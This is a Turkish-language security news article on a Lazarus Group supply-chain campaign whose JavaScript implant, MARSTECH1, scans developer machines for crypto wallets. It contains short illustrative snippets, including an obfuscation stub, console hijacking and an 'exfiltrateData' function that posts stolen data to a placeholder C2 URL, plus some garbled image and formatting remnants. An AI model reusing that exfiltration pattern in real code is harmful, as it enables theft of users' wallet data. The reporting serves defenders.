Kuzey Kore ile bağlantılı siber tehditlerin son zamanlarda yükselmesinde kötü şöhretli Lazarus Grubu, dünya çapında hedef geliştiricileri hedeflemek için sofistike yeni bir taktik ortaya koydu.
“Marstech Mayhem Operasyonu” olarak adlandırılan bu kampanya, “MARSTECH1” olarak bilinen gelişmiş bir kötü amaçlı yazılım implantının konuşlandırılmasını içeriyor.
Operasyon, grubun tedarik zinciri saldırılarında önemli bir evrimi işaret ederek yeni gizleme tekniklerinden ve alışılmadık komuta ve kontrol (C2) altyapısından yararlanır.
MARSTECH1, hedef makinelerde keşifleri kolaylaştıran ana bilgisayar adı, platform ve ana dizin dahil olmak üzere sistem ayrıntılarını toplamak için tasarlanmış JavaScript tabanlı bir implanttır.
.webp)
Kontrol akışı düzleştirme, kendi kendine çağırma fonksiyonları, rastgele değişken ve fonksiyon adları, Base64 dize kodlaması ve anti-debugging kontrolleri gibi gelişmiş gizleme yöntemleri kullanır.
SecurityScorecard’daki güvenlik araştırmacıları, bu tekniklerin meşru yazılım paketlerine veya web sitelerine gömüldüğünde tespit etmeyi zorlaştırdığını belirtti.
// Example of Obfuscated JavaScript
var a = "Base64 encoded string";
var b = atob(a); // Decoding Base64C2 sunucusu, arka uçta Node.js Express kullanılarak 3000 bağlantı noktasında çalışır, 1224 ve 1245 bağlantı noktalarını kullanan önceki işlemlerden ayrılır.
Bu kurulum Stark Industries LLC tarafından barındırılır ve önceki kampanyalarda görülen React Web Yönetici panelinden yoksundur.
# NMAP Scan Example
nmap -p 3000 .webp)
Strike, Lazarus Grubu ile bağlantılı bir GitHub profili olan “Başarı Arkadaşı” belirledi. Bu profil Temmuz 2024’ten beri aktiftir ve hem meşru hem de kötü amaçlı kod depolarını içerir.
.webp)
Profilin web geliştirme ve blockchain’e odaklanması grubun ilgi alanlarıyla uyumludur.
# SuccessFriend GitHub Profile
- **Web Development Skills**
- **Blockchain Learning**Gizleme teknikleri
Aşağıda tüm gizleme tekniklerinden bahsettik:-
- Kontrol akışı düzleştirme: Kod akışını kaçınma algılaması için basitleştirir.
- Rastgele değişken ve işlev adları: Ters mühendisliği zorlaştırır.
- Base64 Kodlama: Algılamayı önlemek için verileri kodlar.
- Anti-kötü niyetli kontroller: Kurcalama girişimlerini tespit ederek analizi önler.
MARSTECH1 implantı, Linux, macOS ve Windows’ta atomik gibi kripto para cüzdanları için sistemleri taramak üzere tasarlanmıştır.
HTTP Post istekleri aracılığıyla bunları C2 sunucusuna göndererek dosya içeriği ve meta verileri çıkarır.
// Example of Data Exfiltration Function
function exfiltrateData(data) {
var payload = {
data: data,
timestamp: Date.now(),
type: "marstech1"
};
// Send payload to C2 server
request.post("https://C2_URL/uploads", payload);
}Kötü amaçlı yazılım, tespitten kaçınmak için gelişmiş anti-analiz teknikleri kullanır. Kritik işlevlerin tekrar tekrar yürütülmesini önlemek için bir kerelik yürütme sargılarını kullanır, bu da güvenlik araçlarının davranışını analiz etmesini zorlaştırır.
Ayrıca, hata ayıklama çıktısını gizlemek için konsol yöntemlerini ele geçirerek faaliyetlerini izleme ve hafifletme çabalarını daha da karmaşıklaştırır.
// Example of Console Hijacking
var originalConsoleLog = console.log;
console.log = function() {
// Custom logging logic
};Gelişmiş gizleme tekniklerinin ve yeni C2 altyapısının kullanımı, tespit ve analiz için önemli zorluklar oluşturmaktadır.
Sonuç olarak, kuruluşların tedarik zinciri faaliyetlerinin sürekli izlenmesi ve gelişmiş tehdit istihbarat çözümlerinin entegrasyonu da dahil olmak üzere sağlam güvenlik önlemlerini benimsemeleri çok önemlidir.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free